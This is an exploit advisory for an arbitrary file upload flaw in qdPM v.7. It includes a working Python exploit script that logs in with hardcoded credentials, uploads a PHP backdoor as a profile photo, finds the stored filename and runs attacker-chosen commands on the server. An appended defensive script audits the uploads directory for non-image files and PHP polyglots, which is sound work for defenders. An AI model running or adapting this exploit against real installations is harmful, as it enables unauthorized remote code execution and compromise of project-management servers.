
qdPM v.7 Arbitrary File Upload

Title: qdPM v.7 Arbitrary File Upload
Author: loneferret
Affected version: 7
Vendor URL: http://qdpm.net/
Tested on: Windows XP / XAMPP

Product description:
# Free project management tool for small teams
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.

Vulnerability analysis:
# The application does not verify the file's extension when uploading an image for a user's profile,
# making it possible to upload a small PHP shell and access it remotely.

# Note(s):
# One needs a valid user account to upload the file. (A Client-level account will do.)
# No authentication is needed to access the uploaded file.

Uploading the file:
After logging in, upload the file here:
# Page: /qdPM/index.php/home/myAccount

# Accessing the file:
# The file can be found here:
# /qdPM/uploads/users/<filename>
#
# Note that the stored filename is prefixed with a random number. One needs
# to look at the page source in the browser to find it.
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />

----- python script -----
#!/usr/bin/python

import re, mechanize
import urllib, sys

print "\n[*] qdPM v.7  Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# Login into site (mechanize keeps the session cookie for the later requests)
try:
    print "[*] Logging in ."
    br = mechanize.Browser()
    br.open("http://%s/qdPM/index.php/home/login" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersForm")
    br.select_form(nr=0)
    # credentials of an existing (client-level) account on the target
    br.form['login[email]'] = "loneferret@test.com"
    br.form['login[password]'] = "123456"
    print "[*] Hope this works"
    br.submit()
except:
    print "[*] Oups..."
    exit(0)

# Upload malicious file as the profile photo (users[photo] is never extension-checked)
try:
    print "[*] Uploading shell .."
    br.open("http://%s/qdPM/home/myAccount" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersAccountForm")
    br.select_form(nr=0)
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
    br.submit(nr=0)
except:
    print "[-] Upload didn't work."
    exit(0)

# Get file name once saved: the account form echoes the stored (random-prefixed) name back
try:
    br.select_form(name="UsersAccountForm")
    for form in br.forms():
        filename = form.controls[9].value
        print "[*] Filename is now: " + filename

    url = "http://%s/qdPM/uploads/users" % rhost
    url += "/%s?cmd=%s" % (filename, rcmd)
    print "[*] Executing command:\n"
    resp = urllib.urlopen(url)
    print resp.read()
except:
    print "[-] Oups..."
    exit(0)
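As an added defender-side example (not code from the advisory or from the qdPM project), the following Python 3 script applies the checks the profile-photo handler should have enforced, an extension allowlist, content magic bytes that agree with the extension, and a scan for embedded PHP open tags, to an existing uploads/users directory so already-stored photos can be triaged. The directory and file contents it builds in `demo()` are constructed samples.

```python
"""Audit a qdPM uploads/users directory for profile photos that are not real images
(constructed example, not code from the advisory or from qdPM)."""
import os
import re
import tempfile

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",  # leading bytes of the
         b"GIF87a": "gif", b"GIF89a": "gif"}                   # accepted image formats
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)  # flags image/PHP polyglots

def classify_upload(filename, data):
    """Return 'ok' or why a stored upload should be quarantined; these are the checks
    the vulnerable handler skipped: extension allowlist, matching magic bytes, no PHP tag."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return "extension-not-allowed"
    ext = "jpg" if ext == "jpeg" else ext
    kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        return "not-an-image"
    if kind != ext:
        return "extension-content-mismatch"
    if PHP_TAG.search(data):
        return "embedded-php-tag"
    return "ok"

def audit_uploads(directory):
    """Map each file that is not 'ok' to its verdict. qdPM prefixes a random number
    to the stored name (e.g. 171793-backdoor.php), so the checks apply unchanged."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                verdict = classify_upload(name, fh.read())
            if verdict != "ok":
                findings[name] = verdict
    return findings

def demo():
    """Build a constructed uploads/users directory in a temp dir and audit it."""
    d = tempfile.mkdtemp()
    samples = {"171793-avatar.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 16,
               "171794-backdoor.php": b"<?php /* constructed marker */ ?>",
               "171795-poly.gif": b"GIF89a" + b"\0" * 8 + b"<?php ?>"}
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return audit_uploads(d)  # -> the .php and the polyglot .gif are flagged
```

Serving the uploads directory with script execution disabled (or from outside the web root) is the complementary fix, since this audit only finds files that were already accepted.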
